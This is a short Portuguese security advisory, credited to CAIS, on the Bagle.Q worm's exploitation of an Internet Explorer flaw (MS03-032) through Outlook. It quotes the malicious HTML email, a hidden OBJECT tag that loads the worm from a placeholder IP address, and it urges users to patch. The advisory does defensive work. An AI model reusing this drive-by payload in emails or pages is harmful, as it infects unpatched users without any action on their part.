Vírus Bagle.Q explora vulnerabilidade do IE

A variante Q do vírus Bagle explora uma vulnerabilidade identificada no Internet Explorer que permite ao worm infectar o sistema sem a intervenção do usuário e sem a presença do executavel anexado na mensagem. O Microsoft Outlook é vulnerável a este Worm pois utiliza o Internet Explorer para visualisar mensagens HTML.

A infecção do sistema ocorre em duas etapas:

Um mensagem é recebida com o seguinte conteúdo:

<html><body>
<font face=System>
<OBJECT STYLE=display:none DATA=http://<IP address>:81/373273.php>
</OBJECT></body></html>

A leitura da mensagem com um dos aplicativos de email vulneraveis (Microsft Outlook e Microsoft Outllok Express), permite que o vírus/worm seja carregado atraves de uma conexao http com o IP especificado no corpo da mensagem.

Sistemas infectados pelo worm passarão a enviar mensagens para os
endereços de email encontrados na maquina vítima.

A vulnerabilidade explorada pelo Worm foi descrita nos seguintes alertas:
- Patch Acumulativo para o Internet Explorer (822925)
- Microsoft Security Bulletin MS03-032

Em virtude da exploração da vulnerabilidade e da potencial propagação do Worm, é recomendado que sejam aplicadas as correções necessárias com urgência, conforme descrito nos alertas citados acima.

Fonte: CAIS